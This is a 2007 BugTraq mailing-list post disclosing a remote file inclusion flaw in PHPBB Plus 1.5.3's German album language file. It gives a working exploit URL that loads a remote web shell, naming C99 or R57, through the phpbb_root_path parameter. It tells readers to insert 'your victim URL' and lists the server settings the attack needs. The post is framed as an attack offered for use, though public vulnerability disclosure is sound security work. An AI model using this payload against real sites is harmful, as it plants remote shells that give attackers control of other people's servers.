BugTraq
PHPBBPLUS 1.5.3 RFI BUG Sep 19 2007 07:07PM
Mehrad1989 gmail com
Hi Milw0rm .
My Name ( AUTHOR ) Is = Mehrad Ansari Targhi
My E-Mail : mehrad1989 (at) gmail (dot) com [email concealed]
My Yahoo Messenger ID : mehrad_1989
Please Instert My Name And E-Mail And My Yahoo Messenger In The Exploit .
I Found a Bug In PHPBB PLUS 1.53 .
This Is A RFI Bug .
This Bug Is In : [ PHPBBPLUS INSTALLED ]/language/lang_german/lang_main_album.php
Exploit : http://[PHPPLUS]/language/lang_german/lang_main_album.php?phpbb_root_pat
h=[ http://shell.txt]?a=
Just Replace http://Shell.txt With Your Script Source Address Like C99 Or R57 Or ... And Replace [PHPPLUS] With Your Victim URL And Remove [] From The Exploit .
Register Global Must Be On , On The Server .
Remote File Inc. Must Be On , On The Server .
German Language Must Be Installed .

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus